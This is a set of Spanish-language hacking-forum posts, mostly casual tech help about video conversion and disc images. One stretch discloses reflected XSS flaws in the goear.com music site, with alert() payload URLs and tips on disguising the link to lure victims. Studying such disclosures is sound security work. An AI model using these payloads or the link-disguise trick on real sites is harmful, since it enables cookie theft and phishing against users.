Mensajes

Cual es? Yo quiero saber :p

No creo que haya problemas, pero primero avísale a ellos yo el xss lo encontré hace un par de meses, incluso se lo mostré a Carloswaldo, pero como los tipos tienen botada la página ayer lo publique xD

[sí es que se puede]

Instala el total video converter, así tiras altiro a formato iphone sí es que se puede :s

Por eso lo puse asi

@Songoku

Trae una opcion en el menu contextual de inicio cabe destacar que funciona muy bien...



Lo que no estoy seguro es si funcionara con un dvd en el PC, de todas maneras si pasa, seleccionas esa opcion y escoges el formato

Instala el total video converter, así tiras altiro a formato iphone sí es que se puede :s

YST sería bueno que reportaras la sqli

Saludos y felicidades

Ok gracias complemente la informacion en el post de SDC que no recordaba xD

http://foro.elhacker.net/nivel_web/recopilatorio_de_vulnerabilidades_de_xsssqlinjection-t220843.0.html;msg1343265#msg1343265

Ahi aclare que la vulnerabilidad no ha sido reparada y puse los datos que se piden

**********
EDITO:
**********

El buscador de goear tambien tiene xss, solo hay que escapar con "> por ejemplo si buscas

Código [Seleccionar] Expandir

green day"><script>alert('janito24')</script>

Lo que te llevaria a:

Código [Seleccionar] Expandir

http://www.goear.com/search.php?q=green+day%22%3E%3Cscript%3Ealert%28%27janito24%27%29%3C%2Fscript%3E

[Esta reportado 11/08/2009]

Por lo general no posteo xss pero este en particular me parece que es especialmente grave por la ingenieria social que se le puede aplicar, ya que es en un sitio de musica online y es facil decir "Oh mira que cancion tan buena" :¬¬

Esta reportado 11/08/2009

El xss esta en la pagina donde se abre el reproductor portable...

Yo lo llamaria inyeccion html :¬¬ pero para que WHK no reclame lo llamaremos xss xD

por ejemplo tenemos una cancion cualquiera:

http://www.goear.com/listenwin.php?v=78707c5

le agregamos nuestro codigo malo xD

http://www.goear.com/listenwin.php?v=78707c5'><script>alert('te robamos tus cookies... gracias ')</script>

Que en el navegador se vera:

http://www.goear.com/listenwin.php?v=78707c5'%3E%3Cscript%3Ealert('te%20robamos%20tus%20cookies...%20gracias%20;)')%3C/script%3E

y que podemos disfrazar en foros asi

http://www.goear.com/listenwin.php?v=78707c5 y decir "esta cancion es genial"

No se cargara la cancion pero la gente no dudara a menos que vea la direccion xD en fin

Saludos.

PD: Solo se le agrego un alert pero la gente puede ser un poco mas ingeniosa, si no quieren que la direccion aparezca como http://www.goear.com/listenwin.php?v=78707c5'> solo quitenlo, se ejecuta igual nuestra inyec... XSS ¬¬

Pues lo he grabado al mínimo, osea, al 2x o a 4x. ¿Deberia haberlo grabado a 16X? De todos modos, si fuera por velocidad de grabación, ¿no se supone que no me habría salido ni el logo?

Un saludo.

Pues si tiene algun tipo de protección podria bloquear el disco por ser grabado en ese caso lo bloquearia despues de leer por lo tanto te podria mostrar datos

Que extensión tiene el archivo sin descomprimir? Abre una carpeta cualquiera, anda a herramientas, opciones, y desmarca "ocultar extensiones de archivos conocidos"

Luego nos cuentas que la extensión es .iso xD

La pregunta adecuada sería... Que extensión tiene el archivo? Por defecto los .iso se aparecen con el icono de Winrar